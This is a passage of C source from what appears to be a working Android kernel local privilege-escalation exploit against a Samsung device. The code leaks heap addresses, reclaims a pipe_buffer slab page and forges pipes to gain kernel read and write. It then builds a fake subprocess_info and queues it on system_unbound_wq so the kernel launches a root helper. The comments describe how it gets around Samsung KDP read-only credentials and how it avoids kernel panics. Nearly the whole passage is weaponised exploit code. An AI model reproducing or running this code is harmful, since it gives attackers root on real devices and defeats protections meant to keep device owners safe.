 * fabricate a `struct subprocess_info` in writable kernel memory (the
 * recovered pipe slab page tail), queue it directly on system_unbound_wq's
 * pool worklist (bypassing call_usermodehelper_exec(), hence both gates),
 * and let call_usermodehelper_exec_async() kernel_execve() our root helper
 * with a legitimate KDP root cred.
 *
 * All layouts below were re-derived from this device's vmlinux.btf:
 *   struct subprocess_info (0x70, __randomize_layout == canonical order)
 *   struct work_struct      (0x30: data@0 entry@8 func@0x18)
 *   struct completion       (0x20: done@0 swait task_list next@0x10)
 *   pool_workqueue          (0x100), workqueue_struct (dfl_pwq@0xb0)
 *   worker_pool             (0x380: worklist@0x20 nr_idle@0x34)
 */
#define GHOST_UMH_SUBPROC_OFF  0x7d00ULL  /* subprocess_info (0x70) in slab tail */
#define GHOST_UMH_DATA_OFF     0x7d80ULL  /* umh_kernel_data (0x168) in slab tail */
#define GHOST_UMH_SOCKET       "/data/local/tmp/temp_su.sock"

struct ghost_umh_completion {
    uint32_t done;
    uint32_t pad0;
    uint32_t lock;
    uint32_t pad1;
    uint64_t next;
    uint64_t prev;
};

struct ghost_umh_data {
    struct ghost_umh_completion completion;   /* 0x20 */
    char path[256];                            /* 0x20 */
    char arg[16];                              /* 0x120 */
    char uid[16];                              /* 0x130 */
    uint64_t argv[4];                          /* 0x140 */
    uint64_t envp[1];                          /* 0x160 */
};

struct ghost_subprocess_info {
    uint8_t  work[48];                         /* data@0 entry@8 func@0x18 */
    uint64_t complete;                         /* 0x30 */
    uint64_t path;                             /* 0x38 */
    uint64_t argv;                             /* 0x40 */
    uint64_t envp;                             /* 0x48 */
    int32_t  wait;                             /* 0x50 */
    int32_t  retval;                           /* 0x54 */
    uint64_t init;                             /* 0x58 */
    uint64_t cleanup;                          /* 0x60 */
    uint64_t data;                             /* 0x68 */
};

_Static_assert(sizeof(struct ghost_subprocess_info) == 0x70,
               "subprocess_info layout");
_Static_assert(sizeof(struct ghost_umh_completion) == 0x20,
               "completion layout");

static int ghost_socket_ready(void) {
    int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
    if (fd < 0) {
        return 0;
    }
    struct sockaddr_un sun;
    memset(&sun, 0, sizeof(sun));
    sun.sun_family = AF_UNIX;
    snprintf(sun.sun_path, sizeof(sun.sun_path), "%s", GHOST_UMH_SOCKET);
    int ready = connect(fd, (struct sockaddr *)&sun, sizeof(sun)) == 0;
    close(fd);
    return ready;
}

static void ghost_wake_unbound(void) {
    int master_fd = posix_openpt(O_RDWR | O_NOCTTY | O_CLOEXEC);
    if (master_fd < 0) {
        return;
    }
    if (grantpt(master_fd) != 0 || unlockpt(master_fd) != 0) {
        close(master_fd);
        return;
    }
    char slave_name[128];
    if (ptsname_r(master_fd, slave_name, sizeof(slave_name)) != 0) {
        close(master_fd);
        return;
    }
    int slave_fd = open(slave_name, O_RDWR | O_NOCTTY | O_CLOEXEC);
    if (slave_fd >= 0) {
        close(slave_fd);
    }
    close(master_fd);
}

/*
 * Queue a fabricated subprocess_info on system_unbound_wq to exec the root
 * helper as uid 0.  Returns 0 once the helper's su socket is accepting
 * (proves the helper ran with root creds -- umh_main() only starts the daemon
 * if geteuid()==0).
 */
static int ghost_install_umh_root(void) {
    uintptr_t subproc_addr = ghost_pipe_base + GHOST_UMH_SUBPROC_OFF;
    uintptr_t umh_data_addr = ghost_pipe_base + GHOST_UMH_DATA_OFF;

    /* 1. Build the fake umh data (completion + path + argv/envp) with the
     *    kernel-side addresses baked in (all inside the slab page tail). */
    struct ghost_umh_data umh_data;
    memset(&umh_data, 0, sizeof(umh_data));
    const char *root_umh_path = getenv("CVE43499_ROOT_HELPER");
    if (!root_umh_path || root_umh_path[0] != '/') {
        root_umh_path = GHOST_ROOT_HELPER;
    }
    if (snprintf(umh_data.path, sizeof(umh_data.path), "%s",
                 root_umh_path) >= (int)sizeof(umh_data.path)) {
        pr_error("ghost root: umh helper path too long\n");
        return 1;
    }
    snprintf(umh_data.arg, sizeof(umh_data.arg), "--umh");
    snprintf(umh_data.uid, sizeof(umh_data.uid), "%u", getuid());

    uintptr_t completion_addr =
        umh_data_addr + offsetof(struct ghost_umh_data, completion);
    uintptr_t wait_list_addr =
        completion_addr + offsetof(struct ghost_umh_completion, next);
    uintptr_t path_addr =
        umh_data_addr + offsetof(struct ghost_umh_data, path);
    uintptr_t arg_addr =
        umh_data_addr + offsetof(struct ghost_umh_data, arg);
    uintptr_t uid_addr =
        umh_data_addr + offsetof(struct ghost_umh_data, uid);
    uintptr_t argv_addr =
        umh_data_addr + offsetof(struct ghost_umh_data, argv);
    uintptr_t envp_addr =
        umh_data_addr + offsetof(struct ghost_umh_data, envp);
    umh_data.completion.next = wait_list_addr;
    umh_data.completion.prev = wait_list_addr;
    umh_data.argv[0] = path_addr;
    umh_data.argv[1] = arg_addr;
    umh_data.argv[2] = uid_addr;
    umh_data.argv[3] = 0;
    umh_data.envp[0] = 0;

    /* 2. Resolve system_unbound_wq -> pwq -> pool (4 reads). */
    uintptr_t wq_slot = ghost_data_alias_fn(SYSTEM_UNBOUND_WQ);
    uint64_t wq = 0;
    if (ghost_read_at(wq_slot, &wq, sizeof(wq)) != 0 || !is_direct_ptr(wq)) {
        pr_error("ghost root: umh read wq failed wq=%016zx\n", wq);
        return 1;
    }
    unsigned char wqb[0x140];
    if (ghost_read_at(wq, wqb, sizeof(wqb)) != 0) {
        pr_error("ghost root: umh read wq struct failed\n");
        return 1;
    }
    uint64_t pwq = 0;
    memcpy(&pwq, wqb + WQ_DFL_PWQ_OFF, sizeof(pwq));
    if (!is_direct_ptr(pwq)) {
        pr_error("ghost root: umh bad pwq=%016zx\n", pwq);
        return 1;
    }

    unsigned char pwqb[0x100];
    if (ghost_read_at(pwq, pwqb, sizeof(pwqb)) != 0) {
        pr_error("ghost root: umh read pwq struct failed\n");
        return 1;
    }
    uint64_t pool = 0, pwq_wq = 0;
    uint32_t color = 0, refcnt = 0, nr_inflight = 0, nr_active = 0,
             max_active = 0;
    memcpy(&pool, pwqb + PWQ_POOL_OFF, sizeof(pool));
    memcpy(&pwq_wq, pwqb + PWQ_WQ_OFF, sizeof(pwq_wq));
    memcpy(&color, pwqb + PWQ_WORK_COLOR_OFF, sizeof(color));
    memcpy(&refcnt, pwqb + PWQ_REFCNT_OFF, sizeof(refcnt));
    memcpy(&nr_inflight, pwqb + PWQ_NR_IN_FLIGHT_OFF, sizeof(nr_inflight));
    memcpy(&nr_active, pwqb + PWQ_NR_ACTIVE_OFF, sizeof(nr_active));
    memcpy(&max_active, pwqb + PWQ_MAX_ACTIVE_OFF, sizeof(max_active));
    if (!is_direct_ptr(pool) || !is_direct_ptr(pwq_wq) || pwq_wq != wq) {
        pr_error("ghost root: umh bad wq/pwq/pool wq=%016zx pwq=%016zx "
                 "pool=%016zx pwq_wq=%016zx\n", wq, pwq, pool, pwq_wq);
        return 1;
    }

    unsigned char poolb[0x380];
    if (ghost_read_at(pool, poolb, sizeof(poolb)) != 0) {
        pr_error("ghost root: umh read pool struct failed\n");
        return 1;
    }
    uintptr_t worklist = pool + POOL_WORKLIST_OFF;
    uint64_t list_next = 0, list_prev = 0;
    uint32_t nr_idle = 0;
    memcpy(&list_next, poolb + POOL_WORKLIST_OFF, sizeof(list_next));
    memcpy(&list_prev, poolb + POOL_WORKLIST_OFF + 8, sizeof(list_prev));
    memcpy(&nr_idle, poolb + POOL_NR_IDLE_OFF, sizeof(nr_idle));

    /* The pool worklist must be empty before we splice our work in. */
    int retries = 0;
    while ((list_next != worklist || list_prev != worklist || nr_idle == 0) &&
           retries < 8) {
        if (ghost_read_at(pool, poolb, sizeof(poolb)) != 0) {
            return 1;
        }
        memcpy(&list_next, poolb + POOL_WORKLIST_OFF, sizeof(list_next));
        memcpy(&list_prev, poolb + POOL_WORKLIST_OFF + 8, sizeof(list_prev));
        memcpy(&nr_idle, poolb + POOL_NR_IDLE_OFF, sizeof(nr_idle));
        retries++;
        usleep(1000);
    }
    if (list_next != worklist || list_prev != worklist || nr_idle == 0) {
        pr_error("ghost root: umh pool busy pool=%016zx list=%016zx/%016zx "
                 "head=%016zx idle=%u\n", pool, list_next, list_prev,
                 worklist, nr_idle);
        return 1;
    }
    if (color >= 16 || refcnt == 0 || nr_active >= max_active) {
        pr_error("ghost root: umh bad pwq state color=%u refcnt=%u "
                 "active=%u/%u\n", color, refcnt, nr_active, max_active);
        return 1;
    }

    /* 3. Build the fake subprocess_info. */
    struct ghost_subprocess_info fake;
    memset(&fake, 0, sizeof(fake));
    uintptr_t fake_entry = subproc_addr + WORK_ENTRY_OFF;
    uint64_t work_data = pwq | ((uint64_t)color << 4) | 5;
    uint64_t umh_work_func = text_addr(CALL_USERMODEHELPER_EXEC_WORK);
    memcpy(fake.work + WORK_DATA_OFF, &work_data, sizeof(work_data));
    memcpy(fake.work + WORK_ENTRY_OFF, &worklist, sizeof(worklist));
    memcpy(fake.work + WORK_ENTRY_OFF + sizeof(uint64_t),
           &worklist, sizeof(worklist));
    memcpy(fake.work + WORK_FUNC_OFF, &umh_work_func, sizeof(umh_work_func));
    fake.complete = completion_addr;
    fake.path = path_addr;
    fake.argv = argv_addr;
    fake.envp = envp_addr;
    /* fake.wait stays 0 -> async kernel_thread path */

    pr_info("ghost root: umh wq=%016zx pwq=%016zx pool=%016zx "
            "worklist=%016zx entry=%016zx color=%u idle=%u\n",
            wq, pwq, pool, worklist, fake_entry, color, nr_idle);

    /* 4. Write the fake data, then splice the work into the pool worklist. */
    if (ghost_write_bytes(umh_data_addr, &umh_data, sizeof(umh_data)) != 0) {
        pr_error("ghost root: umh data write failed\n");
        return 1;
    }
    if (ghost_write_bytes(subproc_addr, &fake, sizeof(fake)) != 0) {
        pr_error("ghost root: umh subproc write failed\n");
        return 1;
    }

    /*
     * Bump refcnt+inflight and nr_active in ONE channel write.  They sit in
     * the same page but not contiguously (REFCNT 0x18, NR_ACTIVE 0x5c), so
     * carry the untouched bytes between them over from the pwq read.  One
     * fewer ghost_write_batch = one fewer fake-lock helper exec + 3 fewer
     * window slots; the UMH stage is where the accumulated fake-lock
     * corruption crosses the hang threshold, so every write we drop widens
     * the margin to a clean run.
     */
    uint64_t rc_ni = ((uint64_t)(nr_inflight + 1) << 32) | (uint32_t)(refcnt + 1);
    uint32_t na = nr_active + 1;
    unsigned char pwq_upd[PWQ_NR_ACTIVE_OFF - PWQ_REFCNT_OFF + 4];
    memcpy(pwq_upd, pwqb + PWQ_REFCNT_OFF, sizeof(pwq_upd));
    memcpy(pwq_upd, &rc_ni, sizeof(rc_ni));
    memcpy(pwq_upd + (PWQ_NR_ACTIVE_OFF - PWQ_REFCNT_OFF), &na, sizeof(na));
    if (ghost_write_bytes(pwq + PWQ_REFCNT_OFF, pwq_upd, sizeof(pwq_upd)) != 0) {
        pr_error("ghost root: umh refcnt/active write failed\n");
        return 1;
    }
    uint64_t entry_pair[2] = { fake_entry, fake_entry };
    if (ghost_write_bytes(worklist, entry_pair, sizeof(entry_pair)) != 0) {
        pr_error("ghost root: umh worklist write failed\n");
        return 1;
    }

    /* 5. Wake the unbound worker and poll for the root helper's socket. */
    unlink(GHOST_UMH_SOCKET);
    int socket_ok = 0;
    for (int i = 0; i < 8 && !socket_ok; i++) {
        ghost_wake_unbound();
        for (int j = 0; j < 250; j++) {
            if (ghost_socket_ready()) {
                socket_ok = 1;
                break;
            }
            usleep(10000);
        }
    }

    pr_info("ghost root: umh result socket=%d\n", socket_ok);
    if (!socket_ok) {
        pr_error("ghost root: umh root helper socket never appeared\n");
        return 1;
    }
    pr_success("ghost root: UMH root helper running as uid 0 "
               "(su socket up)\n");
    return 0;
}

int ghost_install_root_cred(void) {
    if (!kaslr_done || !kaslr_slide) {
        pr_error("ghost root: real KASLR slide not resolved\n");
        return 1;
    }
    if (access(GHOST_ROOT_HELPER, X_OK) != 0) {
        pr_error("ghost root: root helper missing on device\n");
        return 1;
    }

    /*
     * The mm-leak (prepare_pipe_buffer_page) + slot discovery are
     * probabilistic.  The KernelSnitch leak itself is low-false-positive
     * (jhash + collision checks), but the heap-feng-shui reallocation that
     * follows can miss: the reclaimed order-3 page ends up holding closed
     * drain/shaping pipes (or a raced allocation) instead of the live
     * reclaim pipes, so discovery maps zero in-page pipes.  A miss costs
     * the arm + harden + up-to-16 slot-probe execs, and aborting to the
     * supervisor makes the retry re-run the KASLR leak + SELinux flip +
     * static hardening -- the expensive, hardlockup-prone part -- for
     * nothing.  Recover IN-PROCESS instead: the flip and slide are already
     * done, so a retry only re-runs the pure-userspace leak.  Each failed
     * attempt has already told its keeper to release everything (4b below)
     * and reset_pipe_attempt() kills the leak child + closes its pipes, so
     * every retry starts clean with no forged pipes outstanding.
     */
    int discover_rc = -1;
    int mm_attempt = 0;

retry_mm_leak:
    if (mm_attempt >= GHOST_MM_RETRY) {
        pr_error("ghost root: mm-leak missed %d times, giving up\n",
                 mm_attempt);
        return 1;
    }

    /* 1. Reclaim the pipe_buffer slab page (KernelSnitch mm leak). */
    ghost_pipe_base = prepare_pipe_buffer_page();
    if (!is_direct_ptr(ghost_pipe_base)) {
        pr_error("ghost root: pipe buffer page unavailable base=%016zx "
                 "(attempt %d/%d)\n", ghost_pipe_base, mm_attempt + 1,
                 GHOST_MM_RETRY);
        reset_pipe_attempt();
        mm_attempt++;
        goto retry_mm_leak;
    }
    /*
     * Low-DRAM leak candidates almost never reclaim (see GHOST_PIPE_BASE_MIN
     * above).  Re-leak immediately: this skips the arm + keeper + harden +
     * discovery execs on a base that would map zero pipes anyway, and a
     * re-leak is pure userspace (no ghost execs, no extra hardlockup risk).
     */
    if (ghost_pipe_base < GHOST_PIPE_BASE_MIN) {
        pr_warning("ghost root: low-DRAM leak base=%016zx (re-leaking, "
                   "attempt %d/%d)\n", ghost_pipe_base, mm_attempt + 1,
                   GHOST_MM_RETRY);
        reset_pipe_attempt();
        mm_attempt++;
        goto retry_mm_leak;
    }
    pr_success("ghost root: pipe buffer page base=%016zx (attempt %d/%d)\n",
               ghost_pipe_base, mm_attempt + 1, GHOST_MM_RETRY);

    /* 2. Arm every reclaim pipe with a full page of a per-pipe pattern. */
    ghost_arm_pipes();

    /*
     * 3. Fork a pipe KEEPER BEFORE any forging.  It inherits the reclaim
     * pipe fds and never exits, so when this process exits (or is SIGKILLed
     * by the supervisor at timeout) the pipe files' refcount never drops to
     * zero and free_pipe_info() never runs.  Without it, closing the
     * reclaim pipes puts the ghost-forged pipe_buffer.page fields (kernel
     * pages) and panics in free_unref_page (observed K2608130225 and
     * K2608130234 -- the earlier keeper forked only AFTER discovery, so a
     * discovery failure exited with forged pages and no keeper).  Forking
     * here, before discovery, covers every exit path, and the keeper is
     * older than the root child so the task walk still finds the root child
     * as the newest task.  If the fork fails, abort now: nothing is forged
     * yet, so exiting with un-forged pipes is safe.
     *
     * The keeper does NOT hold all 240 reclaim pipes forever: every pipe
     * whose bufs[] lives in the reclaimed page gets ghost-forged during
     * discovery, and those are exactly the pipes discovery maps (a forged
     * pipe always returns zeros and always maps).  All other reclaim pipes
     * still point at their original armed data pages in live re-allocated
     * kmalloc-2k slabs -- closing them is safe (put_page on a real page,
     * kfree of a live slab object).  After discovery the parent sends the
     * mapped-pipe list over keeper_ctrl and the keeper closes everything
     * else, shrinking its pipe-user-pages footprint from 7680 to ~512
     * pages so a retry's pipe setup does not hit pipe-user-pages-hard
     * (F_SETPIPE_SZ EPERM, observed on the attempt-2 rerun).
     */
    int keeper_ctrl[2];
    if (pipe(keeper_ctrl) != 0) {
        pr_error("ghost root: keeper ctrl pipe failed errno=%d\n", errno);
        return 1;
    }
    pid_t keeper = fork();
    if (keeper < 0) {
        pr_error("ghost root: keeper fork failed errno=%d (aborting, "
                 "nothing forged)\n", errno);
        close(keeper_ctrl[0]);
        close(keeper_ctrl[1]);
        return 1;
    }
    if (keeper == 0) {
        /* Keeper child: hold the forged reclaim pipes forever. */
        syscall(SYS_prctl, PR_SET_NAME, "cve43499-keep", 0, 0, 0);
        close(keeper_ctrl[1]);
        /*
         * Read the keep-list the parent sends after discovery: a single
         * atomic message [magic u32][count u32][count x int indices].
         * FAIL-SAFE: if the message cannot be read intact, keep ALL reclaim
         * pipes (old behavior).  Closing a ghost-forged pipe would make
         * free_pipe_info() put_page() a kernel page at exit and panic
         * (observed K2608130341), so only prune when the message is valid.
         * An all-pipes keeper merely costs pipe-user-pages (retry EPERM,
         * graceful) -- never a panic.
         */
        struct ghost_keeper_msg msg;
        unsigned char keep[PIPE_RECLAIM];
        memset(keep, 0, sizeof(keep));
        size_t keep_count = 0;
        int msg_ok = 0;
        size_t want = offsetof(typeof(msg), indices) +
                      (size_t)GHOST_PIPE_MAX_SLOTS * sizeof(int);
        unsigned char raw[sizeof(msg)];
        size_t got = 0;
        while (got < want) {
            ssize_t r = read(keeper_ctrl[0], raw + got, want - got);
            if (r <= 0) {
                break;
            }
            got += (size_t)r;
        }
        if (got == want) {
            memcpy(&msg, raw, sizeof(msg));
            if (msg.magic == 0x43454550U /* 'PEEK' */ &&
                msg.count <= GHOST_PIPE_MAX_SLOTS) {
                msg_ok = 1;
                keep_count = msg.count;
                for (size_t i = 0; i < keep_count; i++) {
                    int idx = msg.indices[i];
                    if (idx < 0 || idx >= PIPE_RECLAIM) {
                        msg_ok = 0;
                        keep_count = 0;
                        break;
                    }
                    keep[idx] = 1;
                }
            }
        }
        pr_info("ghost root: keeper holding %zu forged pipes (msg ok=%d)\n",
                keep_count, msg_ok);
        close(keeper_ctrl[0]);

        /*
         * If the message is invalid, keep ALL reclaim pipes (fail-safe):
         * closing a ghost-forged pipe panics free_pipe_info() at exit, and
         * an all-pipes keeper only costs pipe-user-pages (retry EPERM).
         */
        if (!msg_ok) {
            for (int i = 0; i < PIPE_RECLAIM; i++) {
                keep[i] = 1;
            }
        }

        /* Close every reclaim pipe NOT in the keep set (safe: real pages). */
        for (int i = 0; i < PIPE_RECLAIM; i++) {
            if (keep[i]) {
                continue;
            }
            close(pipe_reclaim_read_fd(i));
            close(pipe_reclaim_write_fd(i));
        }

        /*
         * Clean release: a valid keep-list with zero mapped pipes means the
         * mm-leak missed and NOTHING was forged, so it is safe to exit after
         * releasing every reclaim pipe.  The parent waitpid()s on this exit
         * before re-running the leak, so the retry's F_SETPIPE_SZ never
         * collides with the keeper's still-held pipe reservations.  (A bad
         * message kept ALL pipes above, and a non-empty keep-list means
         * forged pipes are outstanding -- both must stay alive to protect
         * any ghost-forged pipe_buffer.page.)
         */
        if (msg_ok && keep_count == 0) {
            _exit(0);
        }

        /* Close everything else. */
        for (int fd = 3; fd < 65536; fd++) {
            int keep_fd = 0;
            for (int i = 0; i < PIPE_RECLAIM; i++) {
                if (keep[i] &&
                    (fd == pipe_reclaim_read_fd(i) ||
                     fd == pipe_reclaim_write_fd(i))) {
                    keep_fd = 1;
                    break;
                }
            }
            if (!keep_fd) {
                close(fd);
            }
        }
        struct timespec hold = { .tv_sec = 86400, .tv_nsec = 0 };
        for (;;) {
            syscall(SYS_nanosleep, &hold, NULL);
        }
        _exit(0);
    }
    close(keeper_ctrl[0]);

    /*
     * 4. Refcount-harden every kernel page the probes and reads can forge
     * into pipe buffers (empty_zero_page + bm_pmd/bm_pte neighbors and
     * init_task's page), so put_page() at any exit is a no-op even if a
     * forged pipe escapes the keeper's keep-list (collateral writes or a
     * re-allocated free slot -- observed K2608130347 freeing bm_pmd).
     * Must run before any pipe forging (the probes); it writes struct page
     * refcounts, not pipes, so the keeper's pipe protection is unaffected.
     */
    if (ghost_harden_static_pages() != 0) {
        /* Release the keeper (nothing forged yet: hardening runs before
         * discovery) so its 240 pipe reservations don't leak into the
         * supervisor's retry. */
        ghost_keeper_release_all(keeper_ctrl[1]);
        close(keeper_ctrl[1]);
        pr_error("ghost root: static refcount hardening failed\n");
        return 1;
    }

    /* 5. Learn the slot->pipe mapping using empty_zero_page. */
    discover_rc = ghost_discover_slots();

    /*
     * 4b. Tell the keeper which pipes are forged (all mapped pipes) so it
     * can release the rest.  Send the list on every path -- success or
     * failure -- so the keeper never holds 240 pipes across attempts.
     * One atomic write, same struct layout as the keeper expects.
     */
    struct ghost_keeper_msg msg;
    memset(&msg, 0, sizeof(msg));
    msg.magic = 0x43454550U; /* 'PEEK' */
    msg.count = (uint32_t)ghost_mapped_count;
    for (int i = 0; i < ghost_mapped_count; i++) {
        msg.indices[i] = ghost_mapped_pipes[i];
    }
    ssize_t mw = write(keeper_ctrl[1], &msg, sizeof(msg));
    if (mw != (ssize_t)sizeof(msg)) {
        pr_warning("ghost root: keeper msg short write %zd\n", mw);
    }
    close(keeper_ctrl[1]);

    if (discover_rc != 0) {
        /*
         * Distinguish the two failure shapes of ghost_discover_slots():
         *   - ghost_mapped_count == 0: a clean mm-leak miss -- nothing was
         *     forged, so it is safe to reset the pipes and re-leak.
         *   - ghost_mapped_count  > 0: a probe write failed after some
         *     slots were already forged; the forged pipes are held by the
         *     keeper (told via the msg above), but the ghost topology is in
         *     an unknown state, so abort to the supervisor instead of
         *     risking a partial-forge retry.
         */
        if (ghost_mapped_count != 0) {
            pr_error("ghost root: discovery aborted with %d pipes forged; "
                     "not retrying in-process\n", ghost_mapped_count);
            return 1;
        }
        pr_warning("ghost root: mm-leak miss (attempt %d/%d), retrying\n",
                   mm_attempt + 1, GHOST_MM_RETRY);
        /*
         * Wait for the keeper to finish releasing the non-forged pipes
         * before re-running the leak.  On a clean miss the keeper exits
         * after closing them; without this barrier the retry's F_SETPIPE_SZ
         * can race the keeper's release and hit pipe-user-pages-hard
         * (EPERM -> SYSCHK -> exit), the exact failure the keeper pruning
         * was added to prevent.
         */
        pid_t kw;
        do {
            kw = waitpid(keeper, NULL, 0);
        } while (kw < 0 && errno == EINTR);
        if (kw != keeper) {
            pr_warning("ghost root: keeper reap kw=%d errno=%d\n",
                       kw, errno);
        }
        reset_pipe_attempt();
        mm_attempt++;
        goto retry_mm_leak;
    }

    /*
     * ---- DIAG (GHOST_DIAG=1 only): read a page with KNOWN content and
     * compare.  The page at image offset 0x17cb000 is .rodata (kernel log
     * strings: "xt_hashlimit: overflow, try lower: %llu/%llu\n" etc).
     * Read BOTH alias candidates: the old DIRECT_MAP_BASE+off one and the
     * corrected one that adds P0_PHYS_OFFSET+slide.  The corrected alias
     * must return these exact bytes; the old one returns a pointer-table
     * page (phys 0x17cb000).  Gated off by default: the two reads cost ~6
     * ghost execs, the dominant hardlockup risk on this device.
     */
    if (getenv("GHOST_DIAG")) {
        uintptr_t rodata_alias_old = DIRECT_MAP_BASE + 0x17cb000ULL;
        uintptr_t rodata_alias_new =
            ghost_data_alias_fn(KIMAGE_TEXT_BASE + 0x17cb000ULL);
        static const unsigned char expect[256] = {
            0x00, 0x01, 0x36, 0x78, 0x74, 0x5f, 0x68, 0x61, 0x73, 0x68, 0x6c, 0x69, 0x6d, 0x69, 0x74, 0x3a,
            0x20, 0x6f, 0x76, 0x65, 0x72, 0x66, 0x6c, 0x6f, 0x77, 0x2c, 0x20, 0x74, 0x72, 0x79, 0x20, 0x6c,
            0x6f, 0x77, 0x65, 0x72, 0x3a, 0x20, 0x25, 0x6c, 0x6c, 0x75, 0x2f, 0x25, 0x6c, 0x6c, 0x75, 0x0a,
            0x00, 0x01, 0x36, 0x49, 0x50, 0x76, 0x34, 0x3a, 0x20, 0x73, 0x6f, 0x75, 0x72, 0x63, 0x65, 0x20,
            0x72, 0x6f, 0x75, 0x74, 0x65, 0x20, 0x6f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x25, 0x70, 0x49,
            0x34, 0x20, 0x2d, 0x3e, 0x20, 0x25, 0x70, 0x49, 0x34, 0x0a, 0x00, 0x01, 0x33, 0x54, 0x43, 0x50,
            0x3a, 0x20, 0x25, 0x73, 0x3a, 0x20, 0x77, 0x72, 0x6f, 0x6e, 0x67, 0x20, 0x71, 0x75, 0x65, 0x75,
            0x65, 0x20, 0x73, 0x74, 0x61, 0x74, 0x65, 0x0a, 0x00, 0x74, 0x63, 0x70, 0x5f, 0x25, 0x73, 0x00,
            0x01, 0x32, 0x55, 0x44, 0x50, 0x4c, 0x69, 0x74, 0x65, 0x3a, 0x20, 0x25, 0x73, 0x3a, 0x20, 0x43,
            0x61, 0x6e, 0x6e, 0x6f, 0x74, 0x20, 0x61, 0x64, 0x64, 0x20, 0x55, 0x44, 0x50, 0x2d, 0x4c, 0x69,
            0x74, 0x65, 0x20, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x0a, 0x00, 0x6d, 0x63, 0x66,
            0x69, 0x6c, 0x74, 0x65, 0x72, 0x00, 0x66, 0x69, 0x62, 0x5f, 0x61, 0x64, 0x64, 0x5f, 0x69, 0x66,
            0x61, 0x64, 0x64, 0x72, 0x00, 0x09, 0x41, 0x76, 0x65, 0x72, 0x20, 0x64, 0x65, 0x70, 0x74, 0x68,
            0x3a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x25, 0x75, 0x2e, 0x25, 0x30, 0x32, 0x64, 0x0a, 0x00, 0x69,
            0x70, 0x5f, 0x6e, 0x6f, 0x5f, 0x70, 0x6d, 0x74, 0x75, 0x5f, 0x64, 0x69, 0x73, 0x63, 0x00, 0x74,
            0x63, 0x70, 0x5f, 0x6d, 0x69, 0x6e, 0x5f, 0x73, 0x6e, 0x64, 0x5f, 0x6d, 0x73, 0x73, 0x00, 0x74,
        };
        unsigned char rb_old[256];
        unsigned char rb_new[256];
        memset(rb_old, 0, sizeof(rb_old));
        memset(rb_new, 0, sizeof(rb_new));
        ssize_t rr_old = ghost_read_page(rodata_alias_old, rb_old,
                                         sizeof(rb_old));
        pr_info("ghost root: DIAG old alias=%016zx page=%016zx rr=%zd\n",
                (unsigned long)rodata_alias_old,
                (unsigned long)direct_to_page(rodata_alias_old), rr_old);
        if (rr_old > 0) {
            ghost_hex_dump("diag_old", rb_old, (size_t)rr_old);
        }
        ssize_t rr_new = ghost_read_page(rodata_alias_new, rb_new,
                                         sizeof(rb_new));
        pr_info("ghost root: DIAG new alias=%016zx page=%016zx rr=%zd\n",
                (unsigned long)rodata_alias_new,
                (unsigned long)direct_to_page(rodata_alias_new), rr_new);
        if (rr_new <= 0) {
            pr_warning("ghost root: DIAG new alias read failed\n");
        } else {
            int shift = ghost_last_consumed;
            int matched = 0;
            int bad = 0;
            for (ssize_t i = 0; i < rr_new && shift + i < (int)sizeof(expect);
                 i++) {
                if (rb_new[i] == expect[shift + i]) {
                    matched++;
                } else {
                    bad = 1;
                }
            }
            pr_info("ghost root: DIAG new-alias rodata n=%zd consumed=%d "
                    "matched=%d bad=%d\n", rr_new, shift, matched, bad);
            ghost_hex_dump("diag_new", rb_new, (size_t)rr_new);
        }
    }

    /* 5. Install root via the workqueue-UMH route (byte-write).  The cred
     * overwrite is dead on this device (Samsung KDP read-only creds) and
     * modprobe_path is dead (CONFIG_STATIC_USERMODEHELPER_PATH=""); the UMH
     * route fabricates a subprocess_info in the recovered slab page tail and
     * queues it on system_unbound_wq so the kernel execs the root helper with
     * a legitimate KDP root cred. */
    return ghost_install_umh_root();
}

#endif /* SELINUX_GHOST_WRITE */
